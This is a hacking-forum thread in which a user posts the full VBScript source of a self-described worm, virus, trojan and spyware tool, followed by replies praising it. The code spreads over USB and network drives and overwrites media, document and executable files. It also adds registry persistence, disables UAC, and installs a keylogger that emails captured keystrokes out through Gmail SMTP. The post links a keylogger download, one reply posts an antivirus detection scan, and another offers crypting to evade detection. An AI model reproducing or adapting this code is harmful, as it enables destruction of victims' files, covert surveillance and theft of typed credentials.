Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


Enigma Code Computer WoRm 5.0 - (New Malware!)

  • 0 Vote(s) - 0 Average


03-24-2013, 05:10 PM #1
TR4CK3R Offline MadLeets Vip ******
V.I.P
Posts:451 Threads:76 Joined:Mar 2013 Reputation: 0
Mood: In Love
' Enigma Code Computer WoRm 2.0 - by (BlackBox)
' Compiled with the VbsEdit Program
'----------------------------------------------------
' USB Spreading
'----------------------------------------------------

On Error Resume Next
Dim drive, machine
For Each drive In machine
If (drive.DriveType = 2) Or (drive.DriveType = 3) Then
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set fso = CreateObject("Scripting.FileSystemObject")
fso.CopyFile Wscript.ScriptFullName, "C:\Windows\Setup.com", True
fso.CopyFile Wscript.ScriptFullName, "C:\Windows\Data.vbs", True
fso.CopyFile Wscript.ScriptFullName, "C:\windows\Program.exe", True
fso.CopyFile Wscript.ScriptFullName, "A:\Game.com", True
fso.CopyFile Wscript.ScriptFullName, "B:\Game.com", True
fso.CopyFile Wscript.ScriptFullName, "D:\Game.com", True
fso.CopyFile Wscript.ScriptFullName, "E:\Game.com", True
fso.CopyFile Wscript.ScriptFullName, "F:\Game.com", True
fso.CopyFile Wscript.ScriptFullName, "G:\Game.com", True
fso.CopyFile Wscript.ScriptFullName, "H:\Game.com", True
fso.CopyFile Wscript.ScriptFullName, "I:\Game.com", True
fso.CopyFile Wscript.ScriptFullName, "J:\Game.com", True
fso.CopyFile Wscript.ScriptFullName, "K:\Game.com", True
End If
Next


'----------------------------------------------------
' Returns the current directory
'----------------------------------------------------
Set fso = CreateObject("Scripting.FileSystemObject")
Set f1 = fso.GetFolder(".")

strDir = (f1)
Set FSO = CreateObject("Scripting.FileSystemObject")
Set objDir = FSO.GetFolder(strDir)
getInfo(objDir)
Sub getInfo(pCurrentDir)

'----------------------------------------------------
' File Infector Code
'----------------------------------------------------

For Each aItem In pCurrentDir.Files
If LCase(Right(Cstr(aItem.Name), 3)) = "jpg" Then
Set file = fso.CreateTextFile(aItem.Name, True)
file.Write "Enigma Code Computer WoRm 5.0 - By (BlackBox)"
End If
Next


For Each aItem In pCurrentDir.Files
If LCase(Right(Cstr(aItem.Name), 3)) = "doc" Then
Set file = fso.CreateTextFile(aItem.Name, True)
file.Write "Enigma Code Computer WoRm 5.0 - By (BlackBox)"
End If
Next


For Each aItem In pCurrentDir.Files
If LCase(Right(Cstr(aItem.Name), 3)) = "mp3" Then
Set file = fso.CreateTextFile(aItem.Name, True)
file.Write "Enigma Code Computer WoRm 5.0 - By (BlackBox)"
End If
Next


For Each aItem In pCurrentDir.Files
If LCase(Right(Cstr(aItem.Name), 3)) = "avi" Then
Set file = fso.CreateTextFile(aItem.Name, True)
file.Write "Enigma Code Computer WoRm 5.0 - By (BlackBox)"
End If
Next


For Each aItem In pCurrentDir.Files
If LCase(Right(Cstr(aItem.Name), 3)) = "txt" Then
Set file = fso.CreateTextFile(aItem.Name, True)
file.Write "Enigma Code Computer WoRm 5.0 - By (BlackBox)"
End If
Next


'----------------------------------------------------
' Executable File Spreading
'----------------------------------------------------

For Each aItem In pCurrentDir.Files
If LCase(Right(Cstr(aItem.Name), 3)) = "exe" Then
fso.CopyFile Wscript.ScriptFullName, aItem.Name, True
End If
Next


'----------------------------------------------------
' Batch File Spreading
'----------------------------------------------------

For Each aItem In pCurrentDir.Files
If LCase(Right(Cstr(aItem.Name), 3)) = "bat" Then
fso.CopyFile Wscript.ScriptFullName, aItem.Name, True
End If
Next

End Sub

'----------------------------------------------------
' WoRm Installation
'----------------------------------------------------
Set Shell = CreateObject("wscript.shell")
DesktopPath = Shell.SpecialFolders("Desktop")
Set link = Shell.CreateShortCut(DesktopPath & "\Readme.lnk")
link.Description = "Text file"
link.IconLocation = "%SystemRoot%\system32\SHELL32.dll,1"
link.TargetPath = "C:\windows\Program.exe"
link.WindowStyle = 3
link.WorkingDirectory = "C:\windows\Program.exe"
link.Save

'----------------------------------------------------
' Clean Up!
'----------------------------------------------------
Set WShShell = WScript.CreateObject("WScript.Shell")
Value = WSHShell.RegRead ("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KL")
If Value = "C:\Windows\KL.exe" Then
WSHShell.RegDelete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KL"
End If

'----------------------------------------------------
' Registry Entry
'----------------------------------------------------

Dim WshShell, bKey
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft", 1, "REG_BINARY"
WshShell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft", "C:\Windows\Setup.com", "REG_SZ"

'----------------------------------------------------
' UAC Bypass
'----------------------------------------------------
Set WShShell = WScript.CreateObject("WScript.Shell")
Value = WSHShell.RegRead ("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA")
If Value = "1" Then
WSHShell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA", 0, "REG_DWORD"
End If

If (day(Now)=25) Then

'----------------------------------------------------
' The "Enigma Code"
'----------------------------------------------------

Function IP()
rand = int((5 * rnd) + 1) ' IP Addresses
End Function
function Network()
lan = Int((2 * Rnd) + 1) ' Network Routers
End Function
Do Until counter = 10
Dim WshNetwork, filesys, file, rand, lan
Set WshNetwork = WScript.CreateObject("WScript.Network")
Set filesys = CreateObject("Scripting.FileSystemObject")
Set file = filesys.GetFile("C:\Windows\Setup.com")
If filesys.FolderExists("C:\Users") Then
file.Copy ("C:\Users\Setup.com")
Else
End If
On Error Resume Next
Randomize
Network()
IP()
counter=counter + 1
octa="192"
octb="168"
octc=lan
octd=rand
WshNetwork.MapNetworkDrive "Z:", "\\" & octa & "." & octb & "." & octc & "." & octd & "\SharedDocs"
file.Copy ("Z:\Setup.com")
Disconnectdrive()
Loop
function Disconnectdrive()
wshnetwork.removenetworkdrive "Z:"
driveconnected = "0"
End Function
Else
End If

'----------------------------------------------------
' Keylogger!
'----------------------------------------------------

Set filesys = CreateObject("Scripting.FileSystemObject")
If filesys.FileExists("C:\Windows\KL.exe") Then
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KL", 1, "REG_BINARY"
WshShell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KL", "C:\Windows\KL.exe", "REG_SZ"
Set WShShell = WScript.CreateObject("WScript.Shell")
Value = WSHShell.RegRead ("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KL")
If Value = "C:\Windows\KL.exe" Then
WSHShell.RegDelete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft"
End If
If filesys.FileExists("C:\Windows\photo.jpg") Then
user = "??????????????????" ' Make fake Email Address for Keystroke Logging!!!
pass = "password" ' Password here!

Set objmessage = CreateObject("CDO.Message")
objmessage.Subject = "Enigma Code Computer WoRm 5.0"
objmessage.From = user
objmessage.To = user
objmessage.TextBody = "Here are your keystrokes!"
objmessage.AddAttachment "C:\Windows\photo.jpg"
objmessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
objmessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
objmessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/sendusername") = user
objmessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/sendpassword") = pass
objmessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.gmail.com"
objmessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 465
objmessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = 1
objmessage.Configuration.Fields.Item _
("http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout") = 30
objmessage.Configuration.Fields.Update
objmessage.Send
Set objmessage = Nothing
Wscript.Quit
Else
End If
Else

'----------------------------------------------------
' Keylogger Downloader!!!
'----------------------------------------------------

Set objExplorer = WScript.CreateObject("InternetExplorer.Application")
objExplorer.Navigate "about:blank"
objExplorer.ToolBar = 0
objExplorer.StatusBar = 0
objExplorer.Width=400
objExplorer.Height = 200
objExplorer.Left = 0
objExplorer.Top = 0
Do While (objExplorer.Busy)
On Error Resume Next
Wscript.Sleep 200
Loop
objExplorer.Visible = 1
objExplorer.Document.Body.InnerHTML = "This will take a few minutes to complete."

strComputer = "."
Set colServices = GetObject("winmgmts:\\" & strComputer & "\root\cimv2"). _
ExecQuery("Select * from Win32_Service")
For Each objService in colServices
On Error Resume Next
Wscript.Sleep 200
Next
objExplorer.Document.Body.InnerHTML = "Service information retrieved. "

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

Do
Set colProcessList1 = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = 'Update (KB976004).exe'")
For Each objProcess in colProcessList1
On Error Resume Next
Set file = filesys.GetFile("Update (KB976004).exe")
file.Copy ("C:\Windows\KL.exe")
Wscript.Quit
Next

Loop
End If



' The Keylogger works great and now this Computer WoRm
' is a Virus; WoRm; Trojan; and Spyware all in one!
' Virus Code has been tested on the 29th December 2012.
'
' The "Update (KB976004)" file needs to be Uploaded for this Spyware
' to work correctly on any URL.

Download Keylogger: http://www.mediafire.com/?218892jbbexyzvl

[Image: 213qbgp.jpg]


03-24-2013, 05:34 PM #2
HUNT3R KHAN Offline Respected *****
Respected
Posts:96 Threads:25 Joined:Jan 2013 Reputation: 0
Mood: None
Nice bro keep working hard! Smiley1

HUNT3R IS MY NAME
HACKING IS MY GAME!!


03-24-2013, 05:35 PM #3
TR4CK3R Offline MadLeets Vip ******
V.I.P
Posts:451 Threads:76 Joined:Mar 2013 Reputation: 0
Mood: In Love
Thnx Smiley1

[Image: 213qbgp.jpg]


03-24-2013, 05:56 PM #4
Darksnipper Offline Junior Administrator **********
Junior Administrator
Posts:639 Threads:77 Joined:Jun 2012 Reputation: 4
Mood: None
Nice share

Visit My Site:-http://www.1337coders.org
Darksnipper@live.com

03-24-2013, 06:02 PM #5
TR4CK3R Offline MadLeets Vip ******
V.I.P
Posts:451 Threads:76 Joined:Mar 2013 Reputation: 0
Mood: In Love
Thnx Bro Smiley1

[Image: 213qbgp.jpg]


04-02-2013, 06:38 AM #6
H1d@lG0 Offline Posting Freak *****
Registered
Posts:936 Threads:133 Joined:Dec 2012 Reputation: 1
Mood: None
good share ,... Thanks ...................



05-09-2013, 09:40 AM #7
H1d@lG0 Offline Posting Freak *****
Registered
Posts:936 Threads:133 Joined:Dec 2012 Reputation: 1
Mood: None
don't Spam Angrysmiley Seeclorry



05-20-2013, 08:20 PM #8
iMMi~H4x0r^ Offline Member ***
Registered
Posts:61 Threads:13 Joined:Jan 2013 Reputation: 0
Mood: None
. ThNKx Biggrinsmiley

[Image: Basketball_Headshot_001.gif]

07-18-2013, 01:51 AM #9
dR.fAn0 Offline Junior Member **
Registered
Posts:36 Threads:7 Joined:Mar 2013 Reputation: 0
Mood: None
[align=start]
Scan of Keylogger[/align]
File Info:
[b]File Name: Update (KB976004).exe
SHA1: 31c442879dd5f462f57fb2bb7672b07b220f4749
MD5: c01267bacbdddd051837e4c6fe7ca849
Date|Time: 17-07-13,084912
Report Generated by LeVeL-23.info
File Size: 478180 Bytes
Detection: 14 of 35

Detections:
AVG Free-Clean
ArcaVir-Clean
Avast-Clean
AntiVir (Avira)-TR\/Shutdowner.loq
BitDefender-Trojan.Generic.KDV.838323
VirusBuster Internet Security-Clean
Clam Antivirus-Clean
COMODO Internet Security-Clean
Dr.Web-Trojan.Shutdown.1702

eTrust-Vet-Clean
F-PROT Antivirus-Clean
F-Secure Internet Security-Trojan.Generic.KDV.838323
G Data-Trojan.Generic.KDV.838323
IKARUS Security-Trojan.Win32.Shutdowner
Kaspersky Antivirus-Trojan.Win32.Shutdowner.loq
McAfee-Clean
MS Security Essentials-Clean
ESET NOD32-Trojan.Win32\/Spy.KeyLogger.NXN
Norman-winpe\/Shutdowner.CEB
Norton Antivirus-Clean
Panda Security-Suspicious
A-Squared-Trojan.Win32.Shutdowner!IK
Quick Heal Antivirus-Clean
Solo Antivirus-Clean
Sophos-Clean
Trend Micro Internet Security-Clean
VBA32 Antivirus-infected Trojan.Shutdowner
Zoner AntiVirus-Clean
Ad-Aware-Trojan.Win32.Generic!BT
BullGuard-Clean
Immunet Antivirus-Clean
K7 Ultimate-Riskware ( 0040f0fb1 )
NANO Antivirus-Clean
Panda CommandLine-Clean
VIPRE-Clean
[/b]

f0r cRyPt0gRaPhY . . . contact me on level-23.net/forum . . .

07-22-2013, 07:20 AM #10
sniffer Offline Bug Researchers **********
Junior Administrator
Posts:878 Threads:126 Joined:Sep 2012 Reputation: 12
Mood: Happy
thanks bro

jabber : sniffer@jabber.ru






Forum Jump:


Users browsing this thread:1 Guest(s)